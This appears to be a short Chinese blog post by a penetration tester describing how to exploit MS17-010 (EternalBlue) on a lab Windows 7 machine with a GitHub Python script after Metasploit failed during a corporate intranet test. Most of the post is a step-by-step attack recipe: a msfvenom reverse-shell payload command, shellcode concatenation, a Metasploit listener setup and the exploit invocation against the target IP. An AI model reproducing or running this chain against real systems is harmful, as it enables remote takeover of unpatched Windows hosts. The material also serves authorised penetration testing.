前言
才想起来自己还有个博客,草率了
原因:前段时间去做某个公司的内网渗透(打酱油的),内网中扫出了很多的MS17-010,但是msf一直打不成功 5和6的版本都试了就是不行,一度以为机器上的某个杀软打的虚拟补丁,最后小伙伴用这个py脚本打成功了,还是太相信msf了,据说有大佬用msf打ms17-010打了一个月才成功。。。。
进入正题
贴上gaylab项目地址:https://github.com/338317/MS17-010
kali:192.168.149.167
win7:192.168.149.140
过程如下:
生成msf的payload: msfvenom -p windows/x64/shell_reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.149.167 LPORT=4456 将生成的shellcode与提供的文件组成完整的shellcode: cat eternalblue_kshellcode_x64.asm shell_msf.bin >>reverse_shell.bin kali上设置监听: use exploit/multi/handler set payload windows/x64/shell/reverse_tcp(与上面生成shellcode的一样) set EXITFUNC thread set lhost 192.168.149.167 ste lport 4456 run 启动程序: python eternalblue_exploit7.py 192.168.149.140 reverse_shell.bin ps:eternalblue_exploit7用于低版本的windows,如:Windows 7/2008,eternalblue_exploit8用于高版本的windows,如:Windows 8/2012
成功率比较高,当然“小心蓝屏”